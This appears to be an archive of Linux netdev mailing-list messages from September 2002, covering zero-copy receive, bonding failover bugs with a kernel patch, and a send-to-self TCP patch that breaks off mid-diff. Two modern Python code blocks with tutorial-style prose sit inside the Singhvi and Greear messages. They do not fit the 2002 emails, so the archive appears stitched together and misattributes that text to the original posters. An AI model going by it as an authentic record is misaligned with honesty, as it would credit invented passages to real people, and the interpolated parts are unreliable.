[9.56.224.149]) by e6.ny.us.ibm.com (8.12.2/8.12.2) with ESMTP id g8DMCNlg032212; Fri, 13 Sep 2002 18:12:23 -0400 Received: from smtp.linux.ibm.com (ltc-eth1000.torolab.ibm.com [9.26.4.197]) by northrelay01.pok.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g8DMCKws094578; Fri, 13 Sep 2002 18:12:20 -0400 Received: from imap.linux.ibm.com (imap.linux.ibm.com [9.27.103.44]) by smtp.linux.ibm.com (Postfix) with ESMTP id 1259B3FE06; Fri, 13 Sep 2002 18:12:22 -0400 (EDT) Received: by imap.linux.ibm.com (Postfix, from userid 99) id 0A23123C0CB; Fri, 13 Sep 2002 18:12:21 -0400 (EDT) Received: from 9.47.18.15 ( [9.47.18.15]) as user niv@imap.linux.ibm.com by imap.linux.ibm.com with HTTP; Fri, 13 Sep 2002 15:12:20 -0700 Message-ID: <1031955140.3d8262c4c1de9@imap.linux.ibm.com> Date: Fri, 13 Sep 2002 
15:12:20 -0700 From: Nivedita Singhvi To: linux-kernel@vger.kernel.org, todd-lkml@osogrande.com Cc: tcw@tempest.prismnet.com, pfeather@cs.unm.edu, netdev@oss.sgi.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.0 X-Originating-IP: 9.47.18.15 X-archive-position: 178 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: niv@us.ibm.com Precedence: bulk X-list: netdev

Quoting todd-lkml@osogrande.com:

> dave, all,
>
> not sure i understand what you're proposing, but while we're at it,
> why not also make the api for apps to allocate a buffer in userland
> that (for nics that support it) the nic can dma directly into? it

I believe that's exactly what David was referring to - reverse direction sendfile() so to speak..

> seems likely notification that the buffer was used would have to
> travel through the kernel, but it would be nice to save the
> interrupts altogether.

However, I don't think what you're saving are interrupts as much as the extra copy, but I could be wrong..
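For reference, the existing send-side sendfile() path that a receive-side call would mirror can be sketched as follows. This is a minimal illustration in Python, assuming Linux, where `os.sendfile` wraps the sendfile system call; `send_via_shared_mapping` is a hypothetical helper name, the temporary file stands in for whatever file an application would really map, and no claim is made about how much copying a given kernel or NIC actually avoids.

```python
import mmap
import os
import socket
import tempfile


def send_via_shared_mapping(sock, payload):
    """Write payload through a MAP_SHARED mapping, then sendfile() it."""
    if not payload:
        return 0  # a zero-length region cannot be mapped
    with tempfile.TemporaryFile() as f:
        f.truncate(len(payload))  # size the backing file first
        with mmap.mmap(f.fileno(), len(payload), flags=mmap.MAP_SHARED) as shared:
            shared[:] = payload   # the application fills the shared area
            shared.flush()
        sent = 0
        while sent < len(payload):
            # The kernel moves file pages to the socket; no user-space read().
            n = os.sendfile(sock.fileno(), f.fileno(), sent, len(payload) - sent)
            if n == 0:
                break
            sent += n
    return sent


if __name__ == "__main__":
    left, right = socket.socketpair()
    count = send_via_shared_mapping(left, b"hello netdev")
    print(count, right.recv(64))
    left.close()
    right.close()
```

The sketch leaves out any monitoring of socket write space, which an application would need before reusing parts of the mapped area for new data.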
thanks,
Nivedita

From davem@redhat.com Fri Sep 13 15:08:25 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 13 Sep 2002 15:08:27 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8DM8OtG027796 for ; Fri, 13 Sep 2002 15:08:24 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id PAA18236; Fri, 13 Sep 2002 15:04:40 -0700 Date: Fri, 13 Sep 2002 15:04:39 -0700 (PDT) Message-Id: <20020913.150439.27187393.davem@redhat.com> To: linux-kernel@vger.kernel.org, todd-lkml@osogrande.com Cc: hadi@cyberus.ca, tcw@tempest.prismnet.com, netdev@oss.sgi.com, pfeather@cs.unm.edu Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. Miller" In-Reply-To: References: <20020912.161225.20790415.davem@redhat.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 179 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev

   From: todd-lkml@osogrande.com
   Date: Fri, 13 Sep 2002 15:59:15 -0600 (MDT)

   not sure i understand what you're proposing

Cards in the future at 10gbit and faster are going to provide facilities by which:

1) You register an IPv4 src_addr/dst_addr TCP src_port/dst_port cookie with the hardware when TCP connections are opened.
2) The card scans arriving TCP packets; if the cookie matches, it accumulates received data to fill full pages and wakes up the networking when either:

   a) full page has accumulated for a connection
   b) connection cookie mismatch
   c) configurable timer has expired

3) TCP ends up getting receive packets with skb->shinfo() fraglist containing the data portion in full struct page *'s. This can be placed directly into the page cache via sys_receivefile generic code in mm/filemap.c or f.e. NFSD/NFS receive side processing.

   not also make the api for apps to allocate a buffer in userland that
   (for nics that support it) the nic can dma directly into? it seems
   likely notification that the buffer was used would have to travel
   through the kernel, but it would be nice to save the interrupts
   altogether.

This is already doable with sys_sendfile() for send today. The user just does the following:

1) mmap()'s a file with MAP_SHARED to write the data
2) uses sys_sendfile() to send the data over the socket from that file
3) uses socket write space monitoring to determine if the portions of the shared area are reclaimable for new writes

BTW Apache could do this, I doubt it does currently.

The corollary with sys_receivefile would be that the user:

1) mmap()'s a file with MAP_SHARED to write the data
2) uses sys_receivefile() to pull in the data from the socket to that file

There is no need to poll the receive socket space as the successful return from sys_receivefile() is the "data got received successfully" event.

   totally agreed. this is a must for high-performance computing now
   (since who wants to waste 80-100% of their CPU just running the
   network)?

If send side is your bottleneck and you think zerocopy sends of user anonymous data might help, see the above since we can do it today and you are free to experiment.

Franks a lot, David S.
Miller davem@redhat.com From cacophonix@yahoo.com Fri Sep 13 15:17:30 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 13 Sep 2002 15:17:32 -0700 (PDT) Received: from web14006.mail.yahoo.com (web14006.mail.yahoo.com [216.136.175.122]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8DMHUtG028527 for ; Fri, 13 Sep 2002 15:17:30 -0700 Message-ID: <20020913222213.69396.qmail@web14006.mail.yahoo.com> Received: from [156.153.255.134] by web14006.mail.yahoo.com via HTTP; Fri, 13 Sep 2002 15:22:13 PDT Date: Fri, 13 Sep 2002 15:22:13 -0700 (PDT) From: Cacophonix Subject: Re: bonding vs 802.3ad/Cisco EtherChannel link agregation To: Chris Friesen Cc: linux-net@vger.kernel.org, netdev@oss.sgi.com In-Reply-To: <3D81F64B.11182FB1@nortelnetworks.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 180 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: cacophonix@yahoo.com Precedence: bulk X-list: netdev --- Chris Friesen wrote: > "David S. Miller" wrote: > > > > Bonding does not help with single stream performance. > > You have to have multiple apps generating multiple streams > > of data before you'll realize any improvement. > > Therefore netpipe is a bad test for what you're doing. > > This has always confused me. Why doesn't the bonding driver try and spread all the > traffic over all > the links? This would allow for a single stream to use the full aggregate bandwidth of > all bonded > links. Because then you risk heavy packet reordering within an individual flow, which can be detrimental in some cases. --karthik __________________________________________________ Do you Yahoo!? Yahoo! 
News - Today's headlines http://news.yahoo.com From greearb@candelatech.com Fri Sep 13 23:11:11 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 13 Sep 2002 23:11:16 -0700 (PDT) Received: from grok.yi.org (IDENT:YPwVdmTf+C5wfeQxKeNj/So4HPi6pvsw@dhcp101-dsl-usw4.w-link.net [208.161.125.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8E6BAtG032551 for ; Fri, 13 Sep 2002 23:11:10 -0700 Received: from candelatech.com (IDENT:7K6/tSG1vTFCxoNFKt9hTLIiAsoAjI5B@localhost.localdomain [127.0.0.1]) by grok.yi.org (8.11.6/8.11.2) with ESMTP id g8E6Frv17360; Fri, 13 Sep 2002 23:15:54 -0700 Message-ID: <3D82D419.60801@candelatech.com> Date: Fri, 13 Sep 2002 23:15:53 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020722 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "'netdev@oss.sgi.com'" , linux-kernel Subject: TCP connection establishment question (send to self) Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 181 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev I'm continuing work on getting a machine to send packets to itself over external interfaces. Arp and UDP now work with a few small hacks, as hinted to by Alexey.... TCP/IP is not working as well as I had hoped. After binding to the interface, and opening a listening socket, I attempt to connect. I see the first packet go across the looped back wire, but I can get no response to the initial SYN packet. 
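The interface binding mentioned above can be sketched as follows. This is a minimal illustration in Python rather than the C of the test program being described; `device_optval` and `bind_to_device` are hypothetical helper names, the interface name is whatever the caller supplies, and the fallback value 25 is the SO_BINDTODEVICE constant on x86 Linux, assumed here for Python builds that do not export it. The setsockopt call normally needs root (CAP_NET_RAW) and raises OSError otherwise.

```python
import socket

# Linux-specific option; 25 is its value on x86 (assumed when not exported).
SO_BINDTODEVICE = getattr(socket, "SO_BINDTODEVICE", 25)
IFNAMSIZ = 16  # kernel limit on interface names, including the trailing NUL


def device_optval(ifname):
    """Build the NUL-terminated option value for SO_BINDTODEVICE."""
    raw = ifname.encode("ascii")
    if not raw or len(raw) >= IFNAMSIZ:
        raise ValueError("interface name must be 1..15 bytes: %r" % ifname)
    return raw + b"\0"


def bind_to_device(sock, ifname):
    """Restrict sock to one interface for both sending and receiving."""
    sock.setsockopt(socket.SOL_SOCKET, SO_BINDTODEVICE, device_optval(ifname))


if __name__ == "__main__":
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        bind_to_device(s, "lo")
        print("bound to lo")
    except OSError as err:
        print("could not bind:", err)
    finally:
        s.close()
```

In a send-to-self setup both the listening and the connecting socket would each be bound to its own interface before bind()/listen() or connect() is called.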
From printks in the kernel, I see that this code is hit in tcp_v4_do_rcv:

    if (sk->state == TCP_LISTEN) {
        struct sock *nsk = tcp_v4_hnd_req(sk, skb);
        printk("tcp_v4_do_rcv: listen, saddr: %x, nsk: %p, sk: %p\n",
               skb->nh.iph->saddr, nsk, sk);
        if (!nsk)
            goto discard;
        if (nsk != sk) {
            if (tcp_child_process(sk, nsk, skb))
                goto reset;
            return 0;
        }
    }

nsk is null, because this code is hit in tcp_check_req (tcp_v4_search_req found something):

    /* RFC793 page 36: "If the connection is in any non-synchronized state ...
     * and the incoming segment acknowledges something not yet
     * sent (the segment carries an unacceptable ACK) ...
     * a reset is sent."
     */
    if (!(flg & TCP_FLAG_ACK)) {
        if ((skb->nh.iph->saddr == 0x7102a8c0) ||
            (skb->nh.iph->saddr == 0x7002a8c0)) {
            printk("not TCP_FLAG_ACK, flg: 0x%x...\n", flg);
        }
        return NULL;
    }

From my old networking book, it appears that the first packet does not need the ACK flag. A network trace of a connection between two computers does not show the ACK flag in the first packet...

I am using SO_BINDTODEVICE on the connecting and accepting sockets; I'm also using source-based routing.

Any suggestions would be welcome, of course!

Here is the wire capture of the attempted connection:

Frame 1 (74 on wire, 74 captured) Arrival Time: Sep 13, 2002 22:34:26.679702000 Time delta from previous packet: 0.000000000 seconds Time relative to first packet: 0.000000000 seconds Frame Number: 1 Packet Length: 74 bytes Capture Length: 74 bytes Ethernet II Destination: 00:07:e9:09:62:ee (Intel_09:62:ee) Source: 00:07:e9:09:5e:3a (Intel_09:5e:3a) Type: IP (0x0800) Internet Protocol, Src Addr: 192.168.2.112 (192.168.2.112), Dst Addr: 192.168.2.113 (192.168.2.113) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 60 Identification: 0xbc8a Flags: 0x04 .1..
= Don't fragment: Set ..0. = More fragments: Not set Fragment offset: 0 Time to live: 64 Protocol: TCP (0x06) Header checksum: 0xf7ff (correct) Source: 192.168.2.112 (192.168.2.112) Destination: 192.168.2.113 (192.168.2.113) Transmission Control Protocol, Src Port: 33039 (33039), Dst Port: 33040 (33040), Seq: 931994439, Ack: 0, Len: 0 Source port: 33039 (33039) Destination port: 33040 (33040) Sequence number: 931994439 Header length: 40 bytes Flags: 0x00c2 (SYN, ECN, CWR) 1... .... = Congestion Window Reduced (CWR): Set .1.. .... = ECN-Echo: Set ..0. .... = Urgent: Not set ...0 .... = Acknowledgment: Not set .... 0... = Push: Not set .... .0.. = Reset: Not set .... ..1. = Syn: Set .... ...0 = Fin: Not set Window size: 5840 Checksum: 0xad83 (correct) Options: (20 bytes) Maximum segment size: 1460 bytes SACK permitted Time stamp: tsval 42957, tsecr 0 NOP Window scale: 0 bytes Frame 2 (74 on wire, 74 captured) Arrival Time: Sep 13, 2002 22:34:29.669918000 Time delta from previous packet: 2.990216000 seconds Time relative to first packet: 2.990216000 seconds Frame Number: 2 Packet Length: 74 bytes Capture Length: 74 bytes Ethernet II Destination: 00:07:e9:09:62:ee (Intel_09:62:ee) Source: 00:07:e9:09:5e:3a (Intel_09:5e:3a) Type: IP (0x0800) Internet Protocol, Src Addr: 192.168.2.112 (192.168.2.112), Dst Addr: 192.168.2.113 (192.168.2.113) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 60 Identification: 0xbc8b Flags: 0x04 .1.. = Don't fragment: Set ..0. 
= More fragments: Not set Fragment offset: 0 Time to live: 64 Protocol: TCP (0x06) Header checksum: 0xf7fe (correct) Source: 192.168.2.112 (192.168.2.112) Destination: 192.168.2.113 (192.168.2.113) Transmission Control Protocol, Src Port: 33039 (33039), Dst Port: 33040 (33040), Seq: 931994439, Ack: 0, Len: 0 Source port: 33039 (33039) Destination port: 33040 (33040) Sequence number: 931994439 Header length: 40 bytes Flags: 0x00c2 (SYN, ECN, CWR) 1... .... = Congestion Window Reduced (CWR): Set .1.. .... = ECN-Echo: Set ..0. .... = Urgent: Not set ...0 .... = Acknowledgment: Not set .... 0... = Push: Not set .... .0.. = Reset: Not set .... ..1. = Syn: Set .... ...0 = Fin: Not set Window size: 5840 Checksum: 0xac57 (correct) Options: (20 bytes) Maximum segment size: 1460 bytes SACK permitted Time stamp: tsval 43257, tsecr 0 NOP Window scale: 0 bytes Frame 3 (42 on wire, 42 captured) Arrival Time: Sep 13, 2002 22:34:31.669777000 Time delta from previous packet: 1.999859000 seconds Time relative to first packet: 4.990075000 seconds Frame Number: 3 Packet Length: 42 bytes Capture Length: 42 bytes Ethernet II Destination: 00:07:e9:09:62:ee (Intel_09:62:ee) Source: 00:07:e9:09:5e:3a (Intel_09:5e:3a) Type: ARP (0x0806) Address Resolution Protocol (request) Hardware type: Ethernet (0x0001) Protocol type: IP (0x0800) Hardware size: 6 Protocol size: 4 Opcode: request (0x0001) Sender MAC address: 00:07:e9:09:5e:3a (Intel_09:5e:3a) Sender IP address: 192.168.2.112 (192.168.2.112) Target MAC address: 00:00:00:00:00:00 (XEROX_00:00:00) Target IP address: 192.168.2.113 (192.168.2.113) Frame 4 (60 on wire, 60 captured) Arrival Time: Sep 13, 2002 22:34:31.670014000 Time delta from previous packet: 0.000237000 seconds Time relative to first packet: 4.990312000 seconds Frame Number: 4 Packet Length: 60 bytes Capture Length: 60 bytes Ethernet II Destination: 00:07:e9:09:5e:3a (Intel_09:5e:3a) Source: 00:07:e9:09:62:ee (Intel_09:62:ee) Type: ARP (0x0806) Trailer: 
00000000000000000000000000000000... Address Resolution Protocol (reply) Hardware type: Ethernet (0x0001) Protocol type: IP (0x0800) Hardware size: 6 Protocol size: 4 Opcode: reply (0x0002) Sender MAC address: 00:07:e9:09:62:ee (Intel_09:62:ee) Sender IP address: 192.168.2.113 (192.168.2.113) Target MAC address: 00:07:e9:09:5e:3a (Intel_09:5e:3a) Target IP address: 192.168.2.112 (192.168.2.112) -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From pb@bieringer.de Sat Sep 14 05:14:55 2002 Received: with ECARTIS (v1.0.0; list netdev); Sat, 14 Sep 2002 05:14:59 -0700 (PDT) Received: from titan.bieringer.de (mail.bieringer.de [195.226.187.51]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8ECEstG003161 for ; Sat, 14 Sep 2002 05:14:54 -0700 Received: (qmail 22393 invoked from network); 14 Sep 2002 12:19:33 -0000 Received: from pd950fb15.dip.t-dialin.net (HELO ?192.168.1.2?) (217.80.251.21) by mail.bieringer.de with SMTP; 14 Sep 2002 12:19:33 -0000 Date: Sat, 14 Sep 2002 14:19:32 +0200 From: Peter Bieringer To: "netdev@oss.sgi.com" cc: Stephen Waters Subject: Re: RFC 3041 Message-ID: <85130000.1032005972@localhost> In-Reply-To: <1031926014.6546.4.camel@swaters> References: <1031926014.6546.4.camel@swaters> X-Mailer: Mulberry/3.0.0a4 (Linux/x86) X-URL: http://www.bieringer.de/pb/ X-OS: Linux MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="==========805445387==========" X-archive-position: 182 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pb@bieringer.de Precedence: bulk X-list: netdev --==========805445387========== Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline --On Friday, September 13, 2002 09:06:53 AM -0500 Stephen Waters wrote: > Anyone know of any plans or code for implementing 
RFC 3041 "Privacy > Extensions for Stateless Address Autoconfiguration in IPv6" on > Linux? USAGI is working on it. Peter --- Dr. Peter Bieringer mailto: pb at bieringer dot de http://www.bieringer.de/pb/ Key 0x958F422D : B501 24F4 9418 23E2 C0F3 F833 7B57 AA7B 958F 422D --==========805445387========== Content-Type: application/pgp-signature Content-Transfer-Encoding: 7bit -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) iD8DBQE9gylUe1eqe5WPQi0RAqfLAKDfz1/U4q0rQUSMJIh2nrfZIYur8wCg7Dgp ZPxhr8wQn9JAB9/La+moqbo= =ozpe -----END PGP SIGNATURE----- --==========805445387==========-- From pascal.brisset@wanadoo.fr Sat Sep 14 09:33:35 2002 Received: with ECARTIS (v1.0.0; list netdev); Sat, 14 Sep 2002 09:33:40 -0700 (PDT) Received: from smtp03.prod.mgc ([194.250.131.227]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8EGXYtG011719 for ; Sat, 14 Sep 2002 09:33:34 -0700 Received: from pcg.localdomain (194.206.212.1) by smtp03.prod.mgc (6.0.053) id 3D459051002CC11B; Sat, 14 Sep 2002 18:39:18 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15747.26107.382619.200566@pcg.localdomain> Date: Sat, 14 Sep 2002 18:38:19 +0200 From: Pascal Brisset To: bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com Subject: Bonding driver unreliable under high CPU load X-Mailer: VM 6.90 under Emacs 20.7.1 X-archive-position: 183 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pascal.brisset-ml@wanadoo.fr Precedence: bulk X-list: netdev I would like to confirm the problem reported by Tony Cureington at http://sourceforge.net/mailarchive/forum.php?thread_id=1015008&forum_id=2094 Problem: In MII-monitoring mode, when the CPU load is high, the ethernet bonding driver silently fails to detect dead links. How to reproduce: i686, 2.4.19; "modprobe bonding mode=1 miimon=100"; ifenslave two interfaces; ping while you plug/unplug cables. 
Bonding will switch to the available interface, as expected. Now load the CPU with "while(1) { }", and failover will not work at all anymore. Explanation: The bonding driver monitors the state of its slave interfaces by calling their dev->do_ioctl(SIOCGMIIREG|ETHTOOL_GLINK) from a timer callback function. Whenever this occurs during a user task, the get_user() in the ioctl handling code of the slave fails with -EFAULT because the ifreq struct is allocated in the stack of the timer function, above 0xC0000000. In that case, the bonding driver considers the link up by default. This problem went unnoticed because for most applications, when the active link dies, the host becomes idle and the monitoring function gets a chance to run during a kernel thread (in which case it works). The active-backup switchover is just slower than it should be. Serious trouble only happens when the active link dies during a long, CPU-intensive job. Is anyone working on a fix ? Maybe running the monitoring stuff in a dedicated task ? 
-- Pascal From Andrew.Morton@digeo.com Sat Sep 14 20:03:57 2002 Received: with ECARTIS (v1.0.0; list netdev); Sat, 14 Sep 2002 20:04:03 -0700 (PDT) Received: from packet.digeo.com (packet.digeo.com [12.110.80.53]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8F33vtG016440 for ; Sat, 14 Sep 2002 20:03:57 -0700 Received: from digeo-nav01.digeo.com (digeo-nav01.digeo.com [192.168.1.233]) by packet.digeo.com (8.9.3+Sun/8.9.3) with SMTP id UAA12569 for ; Sat, 14 Sep 2002 20:08:39 -0700 (PDT) Received: from schumi.digeo.com ([192.168.1.205]) by digeo-nav01.digeo.com (NAVGW 2.5.2.9) with SMTP id M2002091420123723487 ; Sat, 14 Sep 2002 20:12:37 -0700 Received: from pao-ex01.pao.digeo.com ([172.17.144.34]) by schumi.digeo.com with Microsoft SMTPSVC(5.0.2195.4905); Sat, 14 Sep 2002 20:08:39 -0700 Received: from digeo.com ([172.17.144.18]) by pao-ex01.pao.digeo.com with Microsoft SMTPSVC(5.0.2195.4905); Sat, 14 Sep 2002 20:08:38 -0700 Message-ID: <3D83FD6B.4B492B7D@digeo.com> Date: Sat, 14 Sep 2002 20:24:27 -0700 From: Andrew Morton X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.19-rc5 i686) X-Accept-Language: en MIME-Version: 1.0 To: Pascal Brisset CC: bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com Subject: Re: Bonding driver unreliable under high CPU load References: <15747.26107.382619.200566@pcg.localdomain> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-OriginalArrivalTime: 15 Sep 2002 03:08:38.0869 (UTC) FILETIME=[30209850:01C25C65] X-archive-position: 184 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: akpm@digeo.com Precedence: bulk X-list: netdev Pascal Brisset wrote: > > I would like to confirm the problem reported by Tony Cureington at > http://sourceforge.net/mailarchive/forum.php?thread_id=1015008&forum_id=2094 > > Problem: In MII-monitoring mode, when the CPU load is high, > the ethernet bonding driver silently fails to detect dead links. 
> > How to reproduce: > i686, 2.4.19; "modprobe bonding mode=1 miimon=100"; ifenslave two > interfaces; ping while you plug/unplug cables. Bonding will > switch to the available interface, as expected. Now load the CPU > with "while(1) { }", and failover will not work at all anymore. > > Explanation: > The bonding driver monitors the state of its slave interfaces by > calling their dev->do_ioctl(SIOCGMIIREG|ETHTOOL_GLINK) from a > timer callback function. Whenever this occurs during a user task, > the get_user() in the ioctl handling code of the slave fails with > -EFAULT because the ifreq struct is allocated in the stack of the > timer function, above 0xC0000000. In that case, the bonding driver > considers the link up by default. > > This problem went unnoticed because for most applications, when the > active link dies, the host becomes idle and the monitoring function > gets a chance to run during a kernel thread (in which case it works). > The active-backup switchover is just slower than it should be. > Serious trouble only happens when the active link dies during a long, > CPU-intensive job. > > Is anyone working on a fix ? Maybe running the monitoring stuff in > a dedicated task ? Running the ioctl in interrupt context is bad. Probably what should happen here is that the whole link monitoring function be pushed up to process context via a schedule_task() callout, or a do it in a dedicated kernel thread. This patch will probably make it work, but the slave device's ioctl simply isn't designed to be called from this context - it could try to take a semaphore, or a non-interrupt-safe lock or anything. 
--- linux-2.4.20-pre7/drivers/net/bonding.c Thu Sep 12 20:35:22 2002 +++ linux-akpm/drivers/net/bonding.c Sat Sep 14 20:23:45 2002 @@ -208,6 +208,7 @@ #include #include #include +#include #include #include @@ -401,6 +402,7 @@ static u16 bond_check_dev_link(struct ne struct ifreq ifr; struct mii_ioctl_data *mii; struct ethtool_value etool; + int ioctl_ret; if ((ioctl = dev->do_ioctl) != NULL) { /* ioctl to access MII */ /* TODO: set pointer to correct ioctl on a per team member */ @@ -416,7 +418,13 @@ static u16 bond_check_dev_link(struct ne /* effect... */ etool.cmd = ETHTOOL_GLINK; ifr.ifr_data = (char*)&etool; - if (ioctl(dev, &ifr, SIOCETHTOOL) == 0) { + { + mm_segment_t old_fs = get_fs(); + set_fs(KERNEL_DS); + ioctl_ret = ioctl(dev, &ifr, SIOCETHTOOL); + set_fs(old_fs); + } + if (ioctl_ret == 0) { if (etool.data == 1) { return(MII_LINK_READY); } - From greearb@candelatech.com Sat Sep 14 23:39:25 2002 Received: with ECARTIS (v1.0.0; list netdev); Sat, 14 Sep 2002 23:39:32 -0700 (PDT) Received: from grok.yi.org (IDENT:o4KcMQ3IfXhhpLB75r0OKfc1pKPWuXXo@dhcp101-dsl-usw4.w-link.net [208.161.125.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8F6dOtG017983 for ; Sat, 14 Sep 2002 23:39:25 -0700 Received: from candelatech.com (IDENT:s1JiANbGVaYZBOeI0IjirzUvsqqmSGLV@localhost.localdomain [127.0.0.1]) by grok.yi.org (8.11.6/8.11.2) with ESMTP id g8F6iCv06511; Sat, 14 Sep 2002 23:44:12 -0700 Message-ID: <3D842C3C.6000205@candelatech.com> Date: Sat, 14 Sep 2002 23:44:12 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020722 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "'netdev@oss.sgi.com'" , linux-kernel Subject: [PATCH] Enable sending network traffic to local machine over external interfaces. 
Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 185 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev This patch should allow one to connect over external interface (ie eth1, eth2) and actually have traffic pass externally to the box, not routed internally as now. This is of primary interest to folks wanting to make traffic generators and the like, but it should also be useful for certain HA applications where testing path continuity is desired.... This patch also fixes what I believe is a bug in the SO_BINDTODEVICE implementation (the first syn-ack was not being routed based on the bound-device of the listening socket, but was being routed as if it came from loopback_dev) I have tested ARP, UDP, and TCP/IP traffic, but please consider this beta quality at best. Comments and suggestions are welcome! :) To use this feature, code like this must be written in user space: // Enable an interface to receive packets who's source was our // local machine. By default, we will not do this. // query to see if we are set up for send-to-self strcpy(ifr.ifr_name, dev_name); ifr.ifr_addr.sa_family = AF_INET; if (ioctl(fd, 0x89a1, &ifr) < 0) { VLOG_ERR(VLOG << "ERROR: ioctl(0x89a1): " << strerror(errno) << " ifr.ifr_name -:" << ifr.ifr_name << ":-" << endl); } //result is stored in ifr.ifr_flags, 0 or 1 // Try to make send_to_self true memset(&ifr, 0, sizeof(struct ifreq)); strcpy(ifr.ifr_name, dev_name); ifr.ifr_addr.sa_family = AF_INET; ifr.ifr_flags = 1; if (ioctl(fd, 0x89a0, &ifr) < 0) { VLOG_ERR(VLOG << "ERROR: ioctl(0x89a0): " << strerror(errno) << " ifr.ifr_name -:" << ifr.ifr_name << ":-" << endl); } When using sockets, be sure to use the SO_BINDTODEVICE option before opening or using a socket. // Bind to specific device. 
if (setsockopt(s, SOL_SOCKET, SO_BINDTODEVICE, dev_to_bind_to, DEV_NAME_LEN + 1)) { VLOG_ERR(VLOG << "ERROR: tcp-connect, setsockopt (BINDTODEVICE): " << strerror(errno) << " Not fatal in most cases..continuing...\n"); } Here is the patch, pasted from a larger patch. Hopefully it will apply without problem to 2.4.20-pre7. I have a full patch with pktgen updates in it as well if anyone wants the full thing as an attachment... diff -u -r -N -X /home/greear/exclude.list linux-2.4.19/include/linux/if.h linux-2.4.19.dev/include/linux/if.h --- linux-2.4.19/include/linux/if.h Thu Nov 22 12:47:07 2001 +++ linux-2.4.19.dev/include/linux/if.h Sat Sep 14 22:04:50 2002 @@ -47,6 +47,12 @@ /* Private (from user) interface flags (netdevice->priv_flags). */ #define IFF_802_1Q_VLAN 0x1 /* 802.1Q VLAN device. */ +#define IFF_PKTGEN_RCV 0x2 /* Registered to receive & consume Pktgen skbs */ +#define IFF_ACCEPT_LOCAL_ADDRS 0x4 /** Accept pkts even if they come from a local + * address. This lets use send pkts to ourselves + * over external interfaces (when used in conjunction + * with SO_BINDTODEVICE + */ /* * Device mapping structure. I'd just gone off and designed a diff -u -r -N -X /home/greear/exclude.list linux-2.4.19/include/linux/netdevice.h linux-2.4.19.dev/include/linux/netdevice.h --- linux-2.4.19/include/linux/netdevice.h Sat Sep 14 22:13:44 2002 +++ linux-2.4.19.dev/include/linux/netdevice.h Sat Sep 